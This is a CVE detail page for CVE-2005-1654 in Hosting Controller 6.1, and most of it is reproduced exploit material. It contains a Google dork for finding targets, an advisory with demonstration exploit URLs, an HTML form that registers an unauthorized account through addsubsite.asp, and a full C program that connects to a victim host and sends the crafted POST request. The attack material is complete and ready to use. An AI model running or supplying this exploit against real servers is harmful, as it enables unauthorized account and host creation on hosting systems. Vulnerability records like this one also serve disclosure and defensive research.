CVE-2005-1654 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

<!-- Tested google = intext:"powered by Hosting Controller" intitle:"Hosting Controller" /str0ke Advisory Information ------------------------- Software Package : Hosting Controller Vendor Homepage : http://www.hostingcontroller.com Platforms : Windows based servers Vulnerability : unauthenticated user registeration Risk : High! Vulnerable Versions: All version ( Tested on: v.6.1 Hotfix 1.9 ) Vendor Contacted : 5/3/2005 Release Date : 5/5/2005 Summary ------------ Hosting Controller is a complete array of Web hosting automation tools for the Windows Server family platform. This vulnerability is on the admin/hosting/addsubsite.asp Attacker can create user and host on the target system. Exploit --------- A demonstration exploit URL is provided: http://[target]/admin/hosting/addsubsite.asp?loginname=Mouse&password=123456 http://[target]:8077/hosting/addsubsite.asp?loginname=Mouse&password=123456 --> <FORM action="http://[target]/admin/hosting/addsubsite.asp" method="post"> <INPUT type="hidden" name="reseller" value="resadmin" id="reseller" > <INPUT type="hidden" name="domaintypecheck" value="SECOND" id="Hidden1"> Domain: <INPUT name="DomainName" value="shabgard.org" id="Hidden2"><BR> Username: <INPUT name="loginname" value="Mouse" id="Hidden3"><BR> <INPUT type="hidden" name="Quota" value="-1" id="Hidden4"> <INPUT type="hidden" name="htype" value="27" id="htype" > <INPUT type="hidden" name="choice" value="1" id="Hidden7" > <INPUT type="hidden" name="mailaccess" value="TRUE" id="Hidden5"> Mailserver: <INPUT name="MailServerType" value="IMail" id="Hidden6"><BR> Password: <INPUT name="password" value="123456" id="Hidden8"><BR><BR> <input type="submit" value="Make"><BR> # milw0rm.com [2005-05-04]

/***************************************************** * * * [Hosting Controller <= v6.1] exploit * * * * sileHOSTCxpl * * * * This exploit utilize two ways for exploiting * * vulnerability present into Hosting Controller. * * This exploit create new user with relative * * passwd and registered your host with mail server * * into Hosting Controller software ;\ * * * * References: www.milw0rm.com/id.php?id=979 * * * * coded by: Silentium of Anacron Group Italy * * date: 05/05/2005 * * e-mail: anacrongroupitaly[at]autistici[dot]org * * my_home: www.autistici.org/anacron.group-italy * * * * this tool is developed under GPL license * * no(c) .:. copyleft * * * *****************************************************/ #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #define PORT1 80 // port of web server #define PORT2 8077 // port of hosting controller void info(void); void banner(void); void sendxpl(FILE *out, char *argv[], int type); void errsock(void); void errgeth(void); void errconn(char *argv[]); int main(int argc, char *argv[]){ FILE *out; int sock, sockconn, type; struct sockaddr_in addr; struct hostent *hp; type = atoi(argv[6]); if(argc!=7 || (type < 1) || (type > 2)) info(); banner(); if((sock = socket(AF_INET,SOCK_STREAM,0)) < 0) errsock(); printf("[*] Creating socket [OK]\n"); if((hp = gethostbyname(argv[1])) == NULL) errgeth(); printf("[*] Resolving victim host [OK]\n"); memset(&addr,0,sizeof(addr)); memcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length); addr.sin_family = AF_INET; if(type == 1) addr.sin_port = htons(PORT1); else addr.sin_port = htons(PORT2); sockconn = connect(sock,(struct sockaddr *)&addr,sizeof(addr)); if(sockconn < 0) errconn(argv); printf("[*] Connecting at victim host [OK]\n"); out = fdopen(sock,"a"); setbuf(out,NULL); sendxpl(out,argv,type); if(type == 1) printf("[*] Now test your username and password\n" " on http://%s/admin/\n\n",argv[1]); else printf("[*] Now test your username and password\n" " on http://%s:8077\n\n",argv[1]); shutdown(sock,2); close(sock); return 0; } void info(void){ system("clear"); printf("\n\t #########################################\n" "\t # sileHOSTCxpl #\n" "\t # ################################### #\n" "\t # Hosting Controller #\n" "\t # <= v6.1 exploit #\n" "\t # Unauthenticated User Registration #\n" "\t # coded by Silentium #\n" "\t # [ Anacron Group Italy ] #\n" "\t # ################################### #\n" "\t # www.autistici.org/anacron-group-italy #\n" "\t #########################################\n\n" " [Usage]\n\n" " sileHOSTCxpl <victim> <username> <password> <your_host> <mailserver> <type>\n\n" " [Type]\n\n" " 1) web server daemon [port 80]\n" " 2) hosting controller daemon [port 8077]\n\n" " [Example]\n\n" " sileHOSTCxpl www.victim.com sile silePass anacrongroup.org imail 1\n\n"); exit(1); } void banner(void){ system("clear"); printf("[-] sileHOSTCxpl\n" " ============\n" "[-] Hosting Controller <= v6.1 exploit\n" "[-] coded by Silentium - Anacron Group Italy\n" "[-] www.autistici.org/anacron-group-italy\n\n"); } void sendxpl(FILE *out, char *argv[], int type){ int size = 132; size+=strlen(argv[2]); size+=strlen(argv[3]); size+=strlen(argv[4]); size+=strlen(argv[5]); if(type == 1) fprintf(out,"POST /admin/hosting/addsubsite.asp HTTP/1.0\n" "Connection: Keep-Alive\n" "Pragma: no-cache\n" "Cache-control: no-cache\n" "Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n" "Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n" "Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n" "Accept-Language: en\n" "Host: %s\n" "Content-Type: application/x-www-form-urlencoded\n" "Content-Length: %d\n\n" "reseller=resadmin&domaintypecheck=SECOND&DomainName=%s&loginname=%s&" "Quota=-1&htype=27&choice=1&mailaccess=TRUE&MailServerType=%s&password" "=%s",argv[1],size,argv[4],argv[2],argv[5],argv[3]); else fprintf(out,"POST /hosting/addsubsite.asp HTTP/1.0\n" "Connection: Keep-Alive\n" "Pragma: no-cache\n" "Cache-control: no-cache\n" "Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n" "Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n" "Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n" "Accept-Language: en\n" "Host: %s\n" "Content-Type: application/x-www-form-urlencoded\n" "Content-Length: %d\n\n" "reseller=resadmin&domaintypecheck=SECOND&DomainName=%s&loginname=%s&" "Quota=-1&htype=27&choice=1&mailaccess=TRUE&MailServerType=%s&password" "=%s",argv[1],size,argv[4],argv[2],argv[5],argv[3]); printf("[*] Sending exploit [OK]\n\n"); } void errsock(void){ system("clear"); printf("[x] Creating socket [FAILED]\n\n"); exit(1); } void errgeth(void){ printf("[x] Resolving victim host [FAILED]\n\n"); exit(1); } void errconn(char *argv[]){ printf("[x] Connecting at victim host [FAILED]\n\n",argv[1]); exit(1); } // milw0rm.com [2005-05-07]